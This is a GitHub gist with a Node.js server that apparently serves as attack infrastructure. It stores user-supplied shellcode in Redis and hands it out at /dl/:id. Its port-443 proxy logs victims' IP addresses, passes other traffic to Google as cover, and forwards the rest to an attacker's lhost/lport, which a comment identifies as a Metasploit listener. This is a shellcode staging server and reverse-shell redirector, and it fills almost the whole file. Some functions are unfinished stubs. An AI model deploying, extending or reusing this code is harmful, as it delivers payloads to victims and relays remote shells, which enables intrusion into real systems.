-
-
Save coderarity/1e6e6c3b055edd634fbb to your computer and use it in GitHub Desktop.
shell-squid-test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright (c) 2012 Tom Steele | |
// See the file license.txt for copying permission | |
var fs = require('fs'); | |
var express = require('express'); | |
var redis = require('redis'); | |
var config = require('configure'); | |
var httpProxy = require('http-proxy'); | |
var https = require('https'); | |
if (!config) { | |
console.log('no config found'); | |
process.exit(1); | |
} | |
httpsOptions = { | |
key: fs.readFileSync(config.ssl.key), | |
cert: fs.readFileSync(config.ssl.cert) | |
}; | |
app = express(); | |
app.use(express.bodyParser()); | |
// connect to redis | |
var client = redis.createClient(); | |
client.on('error', function(err, reply) { | |
if (err.toString() === 'Error: Redis connection to 127.0.0.1:6379 failed - connect ECONNREFUSED') { | |
console.log('Error connecting to redis server'); | |
console.log(err); | |
process.exit(1); | |
} | |
console.log('Error', err); | |
}); | |
function buildPayload(name) { | |
return 123; | |
} | |
function buildRedis(name) { | |
return 1234; | |
} | |
// pull shellcode from redis and update remoteip | |
app.get('/dl/:id', function(req, res) { | |
var id = req.param('id'); | |
if (!id) { | |
res.json(200, { error: 'no id provided' }); | |
} | |
client.hget(id, 'shellcode', function(err, reply) { | |
if (err) { | |
console.log('Error', err); | |
res.send('none'); | |
} | |
res.send(reply); | |
}); | |
}); | |
app.get('/delete/:id', function(req, res) { | |
// delete all associated data | |
res.json(200, {response: "success"}); | |
}); | |
// generates a random id and sets up redis | |
app.post('/generate', function(req, res) { | |
var name = req.param('name'); | |
var shellcode = req.param('shellcode'); | |
var lport = req.param('lport'); | |
var lhost = req.param('lhost'); | |
if (!name) { | |
res.json(200, { error: 'no name given' }); | |
return; | |
} | |
if (!shellcode) { | |
res.json(200, { error: 'no shellcode provied' }); | |
return; | |
} | |
if (!lhost) { | |
res.json(200, { error: 'no lhost provied' }); | |
return; | |
} | |
var newId = Math.floor(Math.random() * 1000000); | |
client.set(name, newId, function(err, reply) { | |
if (err) { | |
console.log(err); | |
res.json({ error: err }); | |
} | |
}); | |
client.hmset(newId, "name", name, "shellcode", shellcode, "ip", '', "lhost", lhost, "lport", lport); | |
res.json({ id: newId }); | |
}); | |
// start the https api server | |
var webPort = 8443; | |
if (config.webport) { | |
webPort = config.webport; | |
} | |
https.createServer(httpsOptions, app).listen(webPort); | |
console.log('Express service listening on', webPort); | |
// create and manage the https proxy server | |
// port is not configurable | |
https.createServer(httpsOptions, function (req, res) { | |
var proxyHost = 'www.google.com'; | |
var proxyPort = 443; | |
var url = req.url; | |
var sourceIp = req.connection.remoteAddress; | |
var buffer = httpProxy.buffer(req); | |
console.log('connection from', sourceIp); | |
console.log('requesting', url); | |
if (url.match('/dl/([0-9]{1,7})')) { | |
var id = url.match('dl/([0-9]{1,7})')[1]; | |
client.hset(id, 'ip', sourceIp); | |
client.hset(sourceIp, 'id', id); | |
proxyHost = 'localhost'; | |
proxyPort= webPort; | |
handleIt(proxyHost, proxyPort); | |
} | |
else if (url.match('/generate.*')) { | |
proxyHost = 'localhost'; | |
proxyPort = webPort; | |
handleIt(proxyHost, proxyPort); | |
} | |
else if (url.match('/[a-z-A-Z]+')) { | |
// lookup the metasploit ip and port based of source ip | |
client.hget(sourceIp, 'id', function (err, reply) { | |
if (err) { | |
console.log('Error', err); | |
} | |
client.hgetall(reply, function(err, obj) { | |
if (err) { | |
console.log('Error', err); | |
} | |
proxyHost = obj.lhost; | |
proxyPort = obj.lport; | |
handleIt(proxyHost, proxyPort); | |
}); | |
}); | |
} | |
function handleIt(ph, pp) { | |
var proxy = new httpProxy.HttpProxy({ | |
target: { | |
host: ph, | |
port: pp, | |
https: true, | |
rejectUnauthorized: false, | |
buffer: buffer | |
} | |
}); | |
proxy.proxyRequest(req, res); | |
} | |
}).listen(443); | |
console.log('Proxy server listening on 443') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment